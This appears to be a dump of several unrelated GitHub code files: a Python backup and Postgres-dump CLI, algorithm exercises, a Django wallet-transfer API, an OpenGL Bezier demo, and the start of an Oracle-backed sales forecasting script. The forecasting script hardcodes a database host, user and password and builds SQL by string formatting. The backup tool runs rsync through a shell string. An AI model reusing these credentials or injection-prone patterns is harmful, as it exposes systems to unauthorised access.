help='Absolute path to target directory.')\n@click.option('--update-log-table', is_flag=True, default=False,\n help='Add an entry to Postgres table pydonicli.directory_backup')\n@click.option('--use-rsync', is_flag=True, default=False,\n help='Use the `rsync` executable instead of python to back up source to target.')\n@click.option('-v', '--verbose', is_flag=True, default=False,\n help='Print messages to console.')\n@click.option('--debug', is_flag=True, default=False,\n help='Print debug messages to console.')\n@click.option('--dry-run', is_flag=True, default=False,\n help='Do not execute copy, replace or delete on any files.')\n@click.command()\ndef backup(source, target, update_log_table, use_rsync, verbose, debug, dry_run):\n \"\"\"\n Back up a source directory to a target directory.\n\n This function will accept a source and target directories, most often\n on separate external hard drives, and copy all files from the source\n to the target that are either:\n\n (1) Not in the target directory\n (2) Are in the target directory, but have been updated\n\n Files in the target that have been deleted in the source will also be deleted.\n \"\"\"\n args, result = pydoni.__pydonicli_declare_args__(locals()), dict()\n\n start_ts = time.time()\n vb = Verbose(verbose=verbose, debug=debug)\n ws = ' '\n\n ignore_files = [\n 'The Office S09E16 Moving On.mkv',\n 'The Office S09E20 Paper Airplanes.mkv',\n ]\n\n if update_log_table:\n start_ts_utc = datetime.datetime.utcnow()\n pg = pydoni.Postgres()\n directory_backup_table_schema = 'pydonicli'\n directory_backup_table_name = 'directory_backup'\n\n insert_dict = dict(source=source,\n source_size_bytes=stat(source).st_size,\n target=target,\n target_size_before_bytes=stat(target).st_size,\n target_size_after_bytes=None,\n start_ts=start_ts_utc,\n is_completed=False)\n\n insert_sql = pg.build_insert(schema_name=directory_backup_table_schema,\n table_name=directory_backup_table_name,\n columns=list(insert_dict.keys()),\n values=list(insert_dict.values()),\n validate=True)\n if not dry_run:\n pg.execute(insert_sql)\n\n directory_backup_id = pg.read_sql(f\"\"\"\n select directory_backup_id\n from {directory_backup_table_schema}.{directory_backup_table_name}\n order by gen_ts desc\n limit 1\"\"\").squeeze()\n\n\n assert source != target, 'Source and target directories must be different'\n\n if use_rsync:\n cmd_lst = ['rsync', '--delete-before', '-a', '-h', '-u']\n if verbose:\n cmd_lst = cmd_lst + ['-v', '--progress']\n\n cmd_lst = cmd_lst + [f'\"{source}\"'] + [f'\"{target}\"']\n cmd = ' '.join(cmd_lst)\n\n subprocess.call(cmd, shell=True)\n\n # progress_flag = ' --progress' if verbose else ''\n # backup_cmd = f'rsync -avhu{progress_flag} --delete-before \"{source}\" \"{target}\"'\n # subprocess.call(backup_cmd, shell=True)\n\n else:\n vb.info(f'Listing files at source: {source}')\n files_source = pydoni.listfiles(path=source, recursive=True, full_names=True)\n vb.debug('Found files at source: ' + str(len(files_source)))\n files_source = [x for x in files_source if x not in ignore_files]\n vb.debug(f'Found files at source after filtering out manually ignored files: {len(files_source)}')\n\n vb.info(f'Listing files at target: {target}')\n files_target = pydoni.listfiles(path=target, recursive=True, full_names=True)\n vb.debug('Found files at target: ' + str(len(files_target)))\n files_target = [x for x in files_target if x not in ignore_files]\n vb.debug(f'Found files at target after filtering out manually ignored files: {len(files_target)}')\n\n # Scan source files and for each determine whether to do nothing, copy to target,\n # or replace at target\n copied_files = []\n replaced_files = []\n vb.info('Scanning for new, updated or deleted files at source')\n vb.pbar_init(total=len(files_source), unit='file')\n\n for sourcefile in files_source:\n vb.pbar_write(f'Sourcefile: {sourcefile}', refer_debug=True)\n vb.pbar.set_postfix({'file': basename(sourcefile)})\n\n targetfile = sourcefile.replace(source, target)\n vb.pbar_write(f'{ws}Expected mirrored targetfile: {targetfile}', refer_debug=True)\n\n if not isfile(targetfile):\n # Copy file to target. Create parent directory at target if not exists\n vb.pbar_write(f'{ws}(Copy) attempting to copy file \"{sourcefile}\" to \"{targetfile}\"', refer_debug=True)\n\n targetdpath = dirname(targetfile)\n if not isdir(targetdpath):\n vb.pbar_write(f'{ws}{ws}Parent directory of targetfile does not exist, creating it at: ' + targetdpath, refer_debug=True)\n if not dry_run:\n makedirs(targetdpath)\n\n vb.pbar_write(f'{ws}{ws}Successful', refer_debug=True)\n\n if not dry_run:\n shutil.copy2(sourcefile, targetfile)\n\n vb.pbar_write(f'{ws}Successful', refer_debug=True)\n copied_files.append(sourcefile)\n\n elif isfile(targetfile) and is_file_changed(sourcefile, targetfile):\n # Replace file at target (same action as copy, but parent directory must exist)\n vb.pbar_write(f'(Replace) attempting to copy file \"{sourcefile}\" to \"{targetfile}\"', refer_debug=True)\n if not dry_run:\n shutil.copy2(sourcefile, targetfile)\n\n vb.pbar_write(f'Successful', refer_debug=True)\n replaced_files.append(sourcefile)\n\n else:\n vb.pbar_write(f'{ws}Targetfile already exists and is unchanged', refer_debug=True)\n\n vb.pbar_update(1)\n\n vb.pbar_close()\n\n # Scam target files and for each determine whether that file has been since\n # deleted from source\n deleted_files = []\n vb.info('Scanning for files at target since deleted from source')\n vb.pbar_init(total=len(files_target))\n for targetfile in files_target:\n sourcefile = targetfile.replace(target, source)\n vb.pbar.set_postfix({'file': basename(targetfile)})\n\n if not isfile(sourcefile) and not isdir(sourcefile):\n vb.pbar_write(f'(Delete) attempting to delete \"{targetfile}\"', refer_debug=True)\n if not dry_run:\n send2trash(targetfile)\n\n vb.pbar_write(f'{ws}Successful', refer_debug=True)\n deleted_files.append(targetfile)\n\n vb.pbar_update(1)\n\n vb.pbar_close()\n\n # Record number of files copied, replaced and deleted\n vb.info(f'Copied {len(copied_files)} files')\n vb.info(f'Replaced {len(replaced_files)} files')\n vb.info(f'Deleted {len(deleted_files)} files')\n vb.info(f'Unchanged {len(files_source) - len(copied_files) - len(replaced_files) - len(deleted_files)} files')\n result = dict(copied=len(copied_files),\n replaced=len(replaced_files),\n deleted=len(deleted_files),\n unchanged=len(files_source) - len(copied_files) - len(replaced_files) - len(deleted_files))\n\n if update_log_table:\n vb.debug('Attempting to update log table with results...')\n\n update_dict = dict(target_size_after_bytes=pydoni.dirsize(target),\n end_ts=datetime.datetime.utcnow(),\n is_completed=True)\n\n update_sql = pg.build_update(schema_name=directory_backup_table_schema,\n table_name=directory_backup_table_name,\n pkey_name='directory_backup_id',\n pkey_value=directory_backup_id,\n columns=list(update_dict.keys()),\n values=list(update_dict.values()),\n validate=True)\n\n if not dry_run:\n pg.execute(update_sql)\n\n vb.debug(f'{ws}Successful')\n\n vb.program_complete('Backup complete', start_ts=start_ts)\n pydoni.__pydonicli_register__(dict(args=args, result=result, command_name='data.backup'))\n\n\n@click.option('--backup-dir', type=click.Path(exists=True), required=True,\n help='Path to directory to save database dump to.')\n@click.option('--db-name', type=str, default=None,\n help='Name of local Postgres database to dump.')\n@click.option('--pg-user', type=str, default=None,\n help='Username for Postgres.')\n@click.option('--sep', type=str, default='\\x08',\n help='Separator for local CSV dump. Requires that `csvdump` is True.')\n@click.option('--pgdump', is_flag=True, default=True,\n help='Dump database using `pgdump` utility.')\n@click.option('--csvdump', is_flag=True, default=False,\n help='Dump database as CSV files.')\n@click.option('--max-dir-size', type=float, default=None, required=False,\n help=pydoni.advanced_strip(\"\"\"Maximum backup directory size in GB. If\n specified, after the dump is complete, check if the total directory\n size of `backup_dir` is above this limit. If so, begin by removing the\n oldest backups and re-checking until the size is under the specified\n GB limit.\"\"\"))\n@click.option('--dry-run', is_flag=True, default=False,\n help='Do not execute dump but still run through program.')\n@click.option('-v', '--verbose', is_flag=True, default=False,\n help='Print messages to console.')\n@click.command()\ndef pg_dump(backup_dir,\n db_name,\n pg_user,\n sep,\n pgdump,\n csvdump,\n max_dir_size,\n dry_run,\n verbose):\n \"\"\"\n Dump a local Postgres database. Looks for ~/.pgpass by default.\n \"\"\"\n args, result = pydoni.__pydonicli_declare_args__(locals()), dict()\n\n vb = Verbose(verbose)\n\n if dry_run:\n vb.info('Not executing any code (dry run)')\n\n if pg_user is not None and db_name is not None:\n pg = pydoni.Postgres(pg_user=pg_user, db_name=db_name)\n else:\n # Attempt to parse ~/.pgpass file. Fail if this file does not exist or is not\n # able to be parsed\n pg = pydoni.Postgres()\n\n # Define subfolder to dump files to within dump directory\n subdir = pydoni.systime(compact=True) + '_' + pg.db_name\n backup_subdir = join(expanduser(backup_dir), subdir)\n mkdir(backup_subdir)\n\n vb.info('Database: ' + pg.db_name)\n vb.info('Destination folder: ' + backup_subdir)\n\n # Dump database based on user's preference\n # May dump using pg_dump, export tables to CSV, or both\n\n dumped_files = []\n\n if pgdump:\n vb.info('Executing `pg_dump`')\n if not dry_run:\n dumped_dbfile = pg.dump(backup_dir=backup_subdir)\n dumped_files += [dumped_dbfile]\n\n if csvdump:\n # Dump each file to textfile\n vb.info('Executing CSV dump to tables')\n if not dry_run:\n dumped_csvfiles = pg.dump_tables(backup_dir=backup_subdir, sep=sep, coerce_csv=False)\n dumped_files += dumped_csvfiles\n\n result['backup_directory'] = backup_subdir\n result['dumped_files'] = {}\n for f in dumped_files:\n result['dumped_files'][basename(f)] = dict(\n filesize=stat(f).st_size,\n filesize_readable=pydoni.human_filesize(stat(f).st_size),\n created=datetime.datetime.fromtimestamp(getctime(f)).strftime('%Y-%m-%d %H:%M:%S.%f'),\n rows=pydoni.textfile_len(f))\n\n if verbose:\n vb.line_break()\n tt_list = [[basename(file),\n infodict['created'],\n pydoni.human_filesize(infodict['filesize']),\n str(infodict['rows'])\n ] for file, infodict in result['dumped_files'].items()]\n\n if len(tt_list):\n if verbose:\n print(tt.to_string(\n tt_list,\n header=[click.style(x, bold=True) for x in ['File', 'Created', 'Size', 'Rows']],\n style=tt.styles.ascii_thin_double,\n padding=(0, 1),\n alignment='ccrr'))\n else:\n vb.warn('No database files were dumped!')\n\n if dry_run:\n rmdir(backup_subdir)\n\n max_dir_size_enforced = False\n removed_old_backup_dirs = []\n if max_dir_size:\n # Check size of `backup_dir` and clear any backup directories until the total size\n # is less than max_dir_size (upper GB limit)\n subdirs = sorted([x for x in pathlib.Path(backup_dir).iterdir() if isdir(x)], key=getmtime)\n subdirs_size = zip(subdirs, [pydoni.dirsize(x) / 1e9 for x in subdirs])\n total_size = sum([y for x, y in subdirs_size])\n\n if total_size > max_dir_size:\n vb.warn(f'Enforcing maximum directory size: {str(max_dir_size)} GB')\n max_dir_size_enforced = True\n\n while total_size > max_dir_size:\n dir_to_remove = str(subdirs[0])\n shutil.rmtree(dir_to_remove)\n removed_old_backup_dirs.append(dir_to_remove)\n\n subdirs = sorted([x for x in pathlib.Path(backup_dir).iterdir() if isdir(x)], key=getmtime)\n\n subdirs_size = zip(subdirs, [pydoni.dirsize(x) / 1e9 for x in subdirs])\n total_size = sum([y for x, y in subdirs_size])\n\n vb.warn(f'Removed \"{basename(dir_to_remove)}\"')\n\n vb.program_complete('Postgres dump complete')\n\n result['max_dir_size_enforced'] = max_dir_size_enforced\n result['removed_old_backup_dirs'] = [basename(x) for x in removed_old_backup_dirs]\n\n pydoni.__pydonicli_register__(dict(args=args, result=result, command_name='data.pg_dump'))\n\n\n@click.group(name='data')\ndef cli_data():\n \"\"\"Doni data-based CLI tools.\"\"\"\n pass\n\n\ncli_data.add_command(backup)\ncli_data.add_command(pg_dump)\ncli_data.add_command(append_backup_log_table)\n","repo_name":"tsouchlarakis/pydoni","sub_path":"pydoni/cli/commands/cli_data.py","file_name":"cli_data.py","file_ext":"py","file_size_in_byte":19153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3774412609","text":"\"\"\"\nIn stock market , a person buys a stock and sells it on some future date. Given the stock prices of N days in an form\nof an array A[ ] and a positive integer K, find out the maximum profit a person can make in atmost K transactions.\nA transaction is equivalent to (buying + selling) of a stock and new transaction can start only when the previous\ntransaction has been completed.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. The first\nline of each test case contains a positve integer K, denoting the number of transactions.The second line of each test\ncase contains a positve integer N, denoting the length of the array A[ ].The third line of each test case contains a N\nspace separated positive integers, denoting the prices of each day in the array A[ ].\n\nOutput:\nPrint out the maximum profit earned by the person.No profit will be equivalent to 0.\n\nConstraints:\n1 <= T <= 100\n0 < K <= 200\n2 <= N <=500\n0 <= A[ ] <= 1000\n\nExamples:\nInput:\n3\n2\n6\n10 22 5 75 65 80\n3\n4\n20 580 420 900\n1\n5\n100 90 80 50 25\nOutput:\n87\n1040\n0\n\nExplanation:\nOutput 1: Trader earns 87 as sum of 12 and 75 i.e. Buy at price 10, sell at 22, buy at 5 and sell at 80\nOutput 2: Trader earns 1040 as sum of 560 and 480 i.e. Buy at price 20, sell at 580, buy at 420 and sell at 900\nOutput 3: Trader cannot make any profit as selling price is decreasing day by day.Hence, it is not possible to earn\nanything.\n\"\"\"\nimport sys\ntCases = int(input())\nfor _ in range(tCases):\n k = int(input())\n n = int(input())\n price = list(map(int, input().split()))\n buy = [-sys.maxsize for i in range(k)]\n sell = [0 for x in range(k)]\n for i in range(n):\n buy[0] = max(buy[0], -price[i])\n sell[0] = max(sell[0], buy[0]+price[i])\n for j in range(1, k):\n buy[j] = max(buy[j], sell[j-1]-price[i])\n sell[j] = max(sell[j], buy[j]+price[i])\n print(sell[k-1])","repo_name":"amit-kr-debug/CP","sub_path":"Geeks for geeks/array/Maximum profit by buying and selling a share at most k times.py","file_name":"Maximum profit by buying and selling a share at most k times.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"26399682341","text":"import json\n\nfrom django.http.response import HttpResponse\nfrom rest_framework import permissions, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom credits.models.credits import Invitation, Transfer, Wallet \nfrom credits.serializers.credits import InvitationSerializer, InvitationSerializerCreate, \\\n TransferSerializer, TransferSerializerCreate, WalletSerializer\n\n\n\nclass InvitationsView(APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n # Remaining\n # invitation_filter\n # filter_query_params\n \n \n def get(self, request):\n obj = Invitation.objects.all()\n serializers = InvitationSerializer(obj, many=True)\n data = serializers.data\n return Response({\"DATA\" : data}, status=status.HTTP_201_CREATED)\n \n\n def post(self, request):\n serializer = InvitationSerializerCreate(data=request.data, context={\"request\": request})\n if serializer.is_valid():\n serializer.save()\n data=serializer.data\n return Response({\"DATA\" : data}, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass TransferView(APIView):\n permission_classes = (permissions.IsAuthenticated,)\n \n \n def get(self, request):\n obj = Transfer.objects.all()\n serializers = TransferSerializer(obj, many=True)\n data = serializers.data\n return Response({\"DATA\" : data}, status=status.HTTP_201_CREATED)\n \n \n \n \n def post(self, request):\n sender = self.request.user\n amount = self.request.data.get('amount')\n receiver = self.request.data.get('receiver')\n \n sender_obj, created = Wallet.objects.get_or_create(user__username=sender)\n receiver_obj, created = Wallet.objects.get_or_create(user_id=receiver)\n \n if sender_obj.balance <= 0: \n return Response(\"Amount must be greater than zero\", status=status.HTTP_400_BAD_REQUEST)\n \n elif sender_obj.balance < int(amount): \n return Response(\"Insuffient Sender Wallet Balance\", status=status.HTTP_400_BAD_REQUEST)\n \n \n else:\n sender_obj.balance -= int(amount)\n receiver_obj.balance += int(amount)\n sender_obj.save()\n receiver_obj.save()\n\n serializer = TransferSerializerCreate(data=request.data, context={\"request\" : request})\n if serializer.is_valid():\n serializer.save()\n data = serializer.data\n return Response({\"DATA\" : data}, status=status.HTTP_201_CREATED)\n else:\n return Response({\"ERRORS\" : serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass WalletView(APIView):\n \n def get(self, request, id):\n print(id, 'id')\n wallet_obj = Wallet.objects.filter(user__id=id)\n if wallet_obj.exists():\n serializer = WalletSerializer(wallet_obj, many=True)\n return Response({\"WALLET INFO\" : serializer.data}, status=status.HTTP_201_CREATED)\n else:\n return Response({\"ERRORS\" : \"USER WALLET DOESNT EXIST\"})\n ","repo_name":"Shubham-7777/Social-Media-Project","sub_path":"core/credits/views/credits.py","file_name":"credits.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20001735390","text":"'''\r\nUniversidade Federal de Pernambuco - Campus Recife\r\nAluna: Paula Crislaine de Oliveira Souza Vaz\r\nLogin: pcosv\r\nMatricula: 098.868.804-22\r\nProfessor: Silvio Melo\r\nProjeto I - Processamento Grafico\r\n'''\r\n\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\nfrom OpenGL.GLUT import *\r\nfrom ponto import Ponto\r\nimport bezier\r\nimport sys\r\n\r\nindice = 0\r\npontos = []\r\ntamanho_ponto = 6.0\r\n\r\n\r\n# lendo valores informados pelo usuario no arquivo de entrada\r\nwith open('entrada','r') as input:\r\n arquivo = input.readlines()\r\n grau = int(arquivo[1])\r\n fator = int(arquivo[3])\r\n tam_quad = float(arquivo[5])\r\n\r\n# tratando o caso do usuario entrar com um valor muito grande para o quadrado\r\nif tam_quad > 600:\r\n tam_quad = 600\r\n\r\n# definindo tamanho da tela\r\nwindow_h = 700\r\nwindow_w = 700\r\n\r\n# calculando a quantidade de pontos de controle da curva de bezier\r\nqtd_pontos = grau + 1\r\n\r\n# vértices do quadrado\r\nponto_a = Ponto(50.0, 50.0)\r\nponto_b = Ponto(ponto_a.coord_x + tam_quad, ponto_a.coord_y)\r\nponto_c = Ponto(ponto_a.coord_x + tam_quad, ponto_b.coord_y + tam_quad)\r\nponto_d = Ponto(ponto_a.coord_x, ponto_b.coord_y + tam_quad)\r\nquadrado = [ponto_a, ponto_b, ponto_c, ponto_d]\r\n\r\nlimite = [ponto_a.coord_y, ponto_b.coord_y + tam_quad]\r\n\r\n# esta funcao eh responsavel por calcular as coordenadas dos pontos de controle em funcao dos vertices do quadrado\r\ndef preencher_pontos():\r\n global pontos\r\n\r\n pontos = [Ponto(float(\"{0:.4f}\".format((ponto_d.coord_x))),float(\"{0:.4f}\".format((ponto_d.coord_y + (ponto_a.coord_y - ponto_d.coord_y)/2))))]\r\n i = 1\r\n while i < qtd_pontos:\r\n pontos.append(Ponto(float(\"{0:.4f}\".format((pontos[i-1].coord_x + (ponto_c.coord_x - ponto_d.coord_x)/grau))), float(\"{0:.4f}\".format((ponto_d.coord_y + (ponto_a.coord_y - ponto_d.coord_y)/2)))))\r\n i = i + 1\r\n\r\n return pontos\r\n\r\n# funcao responsavel por redesenhar a janela sempre que necessario\r\ndef desenha():\r\n global globVector\r\n\r\n glClear(GL_COLOR_BUFFER_BIT)\r\n\r\n # desenho do quadrado\r\n glBegin(GL_QUADS)\r\n glColor3f(0.75, 0.75, 0.75)\r\n for ponto in quadrado:\r\n glVertex2f(ponto.coord_x, ponto.coord_y)\r\n glEnd()\r\n\r\n # desenho dos pontos de controle da curva\r\n if pontos.__len__() > 0:\r\n glPointSize(12.0)\r\n glBegin(GL_POINTS)\r\n glColor3f(1.0, 0.0, 0.0)\r\n for ponto in pontos:\r\n glVertex2f(ponto.coord_x, ponto.coord_y)\r\n glEnd()\r\n\r\n # desenho das linhas entre os pontos de controle\r\n if pontos.__len__() > 1:\r\n glBegin(GL_LINE_STRIP)\r\n glColor3f(0.0, 1.0, 1.0)\r\n for ponto in pontos:\r\n glVertex2f(ponto.coord_x, ponto.coord_y)\r\n glEnd()\r\n\r\n # desenho da curva de bezier (linhas conectando os pontos computados pelo De Casteljau\r\n glBegin(GL_LINE_STRIP)\r\n glColor3f(1.0, 1.0, 1.0)\r\n globVector = bezier.bezier(pontos, fator)\r\n glEnd()\r\n\r\n glPointSize(6.0)\r\n\r\n # desenho dos pontos\r\n glBegin(GL_POINTS)\r\n glColor3f(0.0, 1.0, 0.0)\r\n globVector.append(pontos[-1])\r\n for p in globVector:\r\n glVertex2d(p.coord_x, p.coord_y)\r\n glEnd()\r\n\r\n # pintura da area delimitada pela curva\r\n poligono = [ponto_b] + [ponto_a] + globVector\r\n glEnable(GL_BLEND)\r\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\r\n\r\n # pintura da area delimitada pela curva\r\n glBegin(GL_POLYGON)\r\n glColor4f(0.0,0.0,0.3,0.7)\r\n for p in poligono:\r\n glVertex2d(p.coord_x, p.coord_y)\r\n glEnd()\r\n\r\n else:\r\n aux = pontos[0]\r\n glVertex2d(aux.coord_x, aux.coord_y)\r\n\r\n glFlush()\r\n\r\n# funcao que controla botoes do teclado\r\ndef teclado(tecla):\r\n # ao clicar esc a janela eh fechada\r\n if (tecla == 27):\r\n sys.exit(0)\r\n glutPostRedisplay()\r\n\r\n# funcao que cuida das inicializacoes\r\ndef inicializa ():\r\n glMatrixMode(GL_PROJECTION)\r\n glLoadIdentity()\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n gluOrtho2D(0.0, window_w, window_h, 0.0)\r\n\r\n\r\n# funcao que cuida do tratamento de cliques no mouse\r\ndef gerencia_mouse(botao, estado, x, y):\r\n global indice\r\n vector_size = len(pontos)\r\n\r\n # Verifica se o ponto clicado é um ponto de controle\r\n for p in range(0, vector_size):\r\n if (x >= pontos[p].coord_x - tamanho_ponto/2) and (x <= pontos[p].coord_x + tamanho_ponto/2):\r\n if (y >= pontos[p].coord_y - tamanho_ponto / 2) and (y <= pontos[p].coord_y + tamanho_ponto / 2):\r\n indice = p\r\n # print (\"botao de controle\"), p\r\n break\r\n\r\n glutPostRedisplay()\r\n\r\n# funcao que controla o arraste dos pontos de controle confinados ao quadrado\r\ndef move_ponto(x, y):\r\n global indice\r\n\r\n if y < limite[1] and y > limite[0]:\r\n pontos[indice].coord_y = y\r\n else:\r\n pass\r\n\r\n glutPostRedisplay()\r\n\r\n# funcao que impede o redimensionamento da janela, evitando deformacoes no desenho\r\ndef altera_janela(largura, altura):\r\n glutReshapeWindow(window_w, window_h)\r\n\r\n# loop principal\r\nif __name__ == '__main__':\r\n glutInit(sys.argv)\r\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGBA)\r\n glutInitWindowPosition(300, 0)\r\n glutInitWindowSize(window_w, window_h)\r\n glutCreateWindow(b\"Curva de Bezier\")\r\n\r\n glClearColor(0.0, 0.0, 0.0, 0.0)\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n\r\n pontos = preencher_pontos()\r\n glutDisplayFunc(desenha)\r\n glutReshapeFunc(altera_janela)\r\n glutKeyboardFunc(teclado)\r\n glutMouseFunc(gerencia_mouse)\r\n glutMotionFunc(move_ponto)\r\n inicializa()\r\n glutMainLoop()\r\n\r\n# fim do programa","repo_name":"pcosv/Area-painting-delimited-by-a-functional-bezier-curve","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7834044940","text":"# Find all possible combinations of k numbers that add up to a number n, given that only numbers from 1 to 9 can be used and each combination should be a unique set of numbers.\n# \n# \n# Example 1:\n# \n# Input: k = 3, n = 7\n# \n# Output:\n# \n# [[1,2,4]]\n# \n# Example 2:\n# \n# Input: k = 3, n = 9\n# \n# Output:\n# \n# [[1,2,6], [1,3,5], [2,3,4]]\n# Credits:\n# Special thanks to @mithmatt for adding this problem and creating all test cases.\n# \n# Subscribe to see which companies asked this question\n\n# 2018.03.22\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n def dfs(line, nums):\n if len(line) == k:\n if sum(line) == n:\n res.append(line)\n return\n else:\n return\n \n for i, num in enumerate(nums):\n dfs(line + [num], nums[i+1:])\n \n if k == 0 or n <= 0: return []\n if n > sum([ 9 - i for i in xrange(k)]): return []\n res = []\n nums = [1,2,3,4,5,6,7,8,9]\n dfs([], nums)\n return res\n \n\n# 2017.03.24 Rewrite\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n def dfs(line, A, tgt):\n if tgt < 0: return\n if tgt == 0 and len(line) == k:\n res.append(line)\n return\n \n if len(line) < k:\n for i in xrange(len(A)):\n dfs(line + [A[i]], A[i+1:], tgt - A[i])\n \n nums = [ x for x in xrange(1, 10) ]\n res = []\n dfs([], nums, n)\n return res\n\n#\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n nums = range(1, 10)\n print(nums)\n self.dfsHelper(res, nums, [], n, k)\n print(res)\n return res\n\n def dfsHelper(self, res, nums, line, n, k):\n sumList = sum(line)\n if sumList > n or len(line) > k:\n return\n elif sumList == n and len(line) == k:\n res.append(line)\n return\n else:\n for i, num in enumerate(nums):\n self.dfsHelper(res, nums[i+1:], line + [num], n, k)\n\nif __name__ == \"__main__\":\n sol = Solution()\n sol.combinationSum3(3, 7)\n","repo_name":"yihanc/LC","sub_path":"PY/216_combination_sum_iii.py","file_name":"216_combination_sum_iii.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36301410940","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/31 9:14\n# @Author : Ye Jinyu__jimmy\n# @File : error_count.py\nimport pandas as pd\nimport cx_Oracle\nimport os\nimport numpy as np\n# 显示所有列\npd.set_option('display.max_columns', None)\n# 显示所有行\npd.set_option('display.max_rows', 500)\n# 设置value的显示长度为100,默认为50\npd.set_option('max_colwidth', 100)\n# 注:设置环境编码方式,可解决读取数据库乱码问题\nos.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'\nfrom matplotlib import pyplot as plt\nimport multiprocessing\nimport re\nfrom matplotlib.ticker import FuncFormatter\nimport matplotlib.dates as mdate\n#parser是根据字符串解析成datetime,字符串可以很随意,可以用时间日期的英文单词,\n# 可以用横线、逗号、空格等做分隔符。没指定时间默认是0点,没指定日期默认是今天,没指定年份默认是今年。\nfrom dateutil.parser import parse\n# from pylab import *\nplt.switch_backend('agg')\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n#如下是支持中文数字\n# mpl.rcParams['font.sans-serif'] = ['SimHei']\n#读取得到数据\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nimport matplotlib.pyplot as plt\nfrom tqdm import *\nimport itertools\nimport datetime\nimport os\nimport copy\nimport sys\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.linear_model import LinearRegression\nimport math\nimport warnings\nfrom chinese_calendar import is_workday, is_holiday\n# import chinese_calendar as calendar #\nimport time\nwarnings.filterwarnings(\"ignore\")\n\n\n#读取预测数据这里是csv的文件\ndef read_forecast_data(old_path):\n data_old = pd.read_csv(old_path,encoding='utf_8_sig',low_memory=False)\n return data_old\n\n#读取sku的名称\n#---------------------------------------------------------------->根据SKU 的id来获取每个SKU的具体的销售明细数据\ndef get_sku_name(sku_id):\n host = \"192.168.1.11\" # 数据库ip\n port = \"1521\" # 端口\n sid = \"hdapp\" # 数据库名称\n dsn = cx_Oracle.makedsn(host, port, sid)\n\n # hd40是数据用户名,xfsg0515pos是登录密码(默认用户名和密码)\n conn = cx_Oracle.connect(\"hd40\", \"xfsg0515pos\", dsn)\n # 查看出货详细单的数据\n stkout_detail_sql = \"\"\"SELECT g.NAME FROM GOODSH g WHERE g.gid = %s \"\"\" % (sku_id)\n sku_name = pd.read_sql(stkout_detail_sql, conn)\n conn.close\n return sku_name\n\n#---------------------------------------------------------------->根据SKU 的id来获取每个SKU的具体的销售明细数据\ndef get_dc_name(dc_code):\n host = \"192.168.1.11\" # 数据库ip\n port = \"1521\" # 端口\n sid = \"hdapp\" # 数据库名称\n dsn = cx_Oracle.makedsn(host, port, sid)\n\n # hd40是数据用户名,xfsg0515pos是登录密码(默认用户名和密码)\n conn = cx_Oracle.connect(\"hd40\", \"xfsg0515pos\", dsn)\n # 查看出货详细单的数��\n stkout_detail_sql = \"\"\"SELECT s.NAME FROM STORE s where s.gid = %s \"\"\" % (dc_code)\n dc_name = pd.read_sql(stkout_detail_sql, conn)\n conn.close\n return dc_name\n\n\n#--------------------------------------------------------------------------------->日的标准化转化\ndef date_normalize(data_frame):\n data_frame['Account_date'] = pd.to_datetime(data_frame['Account_date']).dt.normalize()\n return data_frame\n\n\n#--------------------------------------------------------------------------------->原始日期的标准转化\ndef date_original_normalize(data_frame):\n data_frame['OCRDATE'] = pd.to_datetime(data_frame['OCRDATE']).dt.normalize()\n return data_frame\n\n\n#------------------------------------------------------------------------------->以日期作为分组内容查看每天每个SKU的具体的销量\ndef data_group(data):\n #这里的毛利是门店卖出的总金额与仓库进货的总金额的差值比\n data['GROSS_PROFIT_RATE'] = (data['RTOTAL'] - data['TOTAL']) / data['TOTAL']\n #计算仓库销售的正确单价\n data['PRICE'] = data['PRICE']/ data['QTY']\n #以下是用来保存分组后的数据\n sales_data = pd.DataFrame(columns = [\"Account_date\",\"Sku_id\",'Dc_name',\"Sales_qty\",\"Price\",'Gross_profit_rate','Dc_code',\n 'Wrh','Warehouse_name','Sku_name','Munit'])\n sales_data[\"Sales_qty\"]=data.groupby([\"OCRDATE\"],as_index = False).sum()[\"QTY\"]\n sales_data[\"Price\"] = data.groupby([\"OCRDATE\"],as_index = False).mean()[\"PRICE\"]\n sales_data[\"Gross_profit_rate\"] = data.groupby([\"OCRDATE\"],as_index = False).mean()[\"GROSS_PROFIT_RATE\"]\n sales_data[\"Account_date\"]= data.groupby(['OCRDATE']).sum().index\n sales_data[\"Sku_id\"] = [data[\"GDGID\"].iloc[0]]*len(sales_data[\"Sales_qty\"])\n sales_data[\"Dc_name\"] = [data[\"DC_NAME\"].iloc[0]] * len(sales_data[\"Sku_id\"])\n 